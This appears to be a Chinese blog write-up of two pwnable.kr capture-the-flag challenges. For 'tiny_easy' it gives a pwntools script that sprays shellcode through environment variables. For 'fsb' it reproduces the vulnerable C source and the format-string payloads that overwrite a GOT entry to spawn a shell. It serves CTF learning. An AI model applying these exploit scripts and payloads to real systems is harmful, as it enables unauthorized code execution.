pwnable-kr-4

Pwn pwnable.kr
bin
发布日期:   2018-10-30
更新日期:   2023-05-25
文章字数:   499
阅读时长:   3 分
阅读次数:  

1.tiny_easy

solve

from pwn import *
shellcode  = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
shellcode += "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
shellcode += "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
shellcode += "\x32\xc1\x51\x69\x30\x30\x74\x69"
shellcode += "\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
shellcode += "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
payload = "\x90" * 8000 + shellcode
#p64(0xff9c3844)
env = {}
for i in range(1,0x100):
    env[str(i)] = payload


while True:
    io = process([p32(0xff9c3844)],executable="./tiny_easy", env=env)
    io.interactive()

flag

What a tiny task :) good job!

2.fsb

question

#include <stdio.h>
#include <alloca.h>
#include <fcntl.h>

unsigned long long key;
char buf[100];
char buf2[100];

int fsb(char** argv, char** envp){
    char* args[]={"/bin/sh", 0};
    int i;

    char*** pargv = &argv;
    char*** penvp = &envp;
        char** arg;
        char* c;
        for(arg=argv;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
        for(arg=envp;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
    *pargv=0;
    *penvp=0;

    for(i=0; i<4; i++){
        printf("Give me some format strings(%d)\n", i+1);
        read(0, buf, 100);
        printf(buf);
    }

    printf("Wait a sec...\n");
        sleep(3);

        printf("key : \n");
        read(0, buf2, 100);
        unsigned long long pw = strtoull(buf2, 0, 10);
        if(pw == key){
                printf("Congratz!\n");
                execve(args[0], args, 0);
                return 0;
        }

        printf("Incorrect key \n");
    return 0;
}

int main(int argc, char* argv[], char** envp){

    int fd = open("/dev/urandom", O_RDONLY);
    if( fd==-1 || read(fd, &key, 8) != 8 ){
        printf("Error, tell admin\n");
        return 0;
    }
    close(fd);

    alloca(0x12345 & key);

    fsb(argv, envp); // exploit this format string bug!
    return 0;
}

##solve

fsb@ubuntu:~$ ./fsb > /dev/null
%134520836c%14$n
%134514347c%20$n
cat flag>&0

change got.plt

gdb-peda$ got

GOT protection: Partial RELRO | GOT functions: 10

[0x804a000] read@GLIBC_2.0 -> 0xf7610b00 (read) ◂— cmp    dword ptr gs:[0xc], 0
[0x804a004] printf@GLIBC_2.0 -> 0x80486ab (fsb+375) ◂— mov    eax, dword ptr [ebp - 0x24]
[0x804a008] sleep@GLIBC_2.0 -> 0x8048406 (sleep@plt+6) ◂— push   0x10
[0x804a00c] puts@GLIBC_2.0 -> 0x8048416 (puts@plt+6) ◂— push   0x18
[0x804a010] __gmon_start__ -> 0x8048426 (__gmon_start__@plt+6) ◂— push   0x20 /* 'h ' */
[0x804a014] open@GLIBC_2.0 -> 0xf76106f0 (open) ◂— cmp    dword ptr gs:[0xc], 0
[0x804a018] __libc_start_main@GLIBC_2.0 -> 0xf7553540 (__libc_start_main) ◂— call   0xf765ab59
[0x804a01c] execve@GLIBC_2.0 -> 0x8048456 (execve@plt+6) ◂— push   0x38 /* 'h8' */
[0x804a020] strtoull@GLIBC_2.0 -> 0x8048466 (strtoull@plt+6) ◂— push   0x40 /* 'h@' */
[0x804a024] close@GLIBC_2.0 -> 0xf7611290 (close) ◂— cmp    dword ptr gs:[0xc], 0

flag

Have you ever saw an example of utilizing [n] format character?? :(
文章作者: xyzz
文章链接: http://www.xyzzpwn.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 xyzz !
Pwn pwnable.kr
 上一篇
lctf2018-god of domain pentest lctf2018-god of domain pentest
question题目描述: windows域环境权限不好配,还请各位师傅高抬贵手,不要搅屎 c段只用到了0-20,不需要扫21-255,端口也只开放了常用端口。 web.lctf.com中有个域用户是web.lctf.com\bugua
2018-11-20 web writeup
Pentest
下一篇 
pwnable.kr_3 pwnable.kr_3
16.unlinkquestion #include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ
2018-08-23 bin
Pwn pwnable.kr
  目录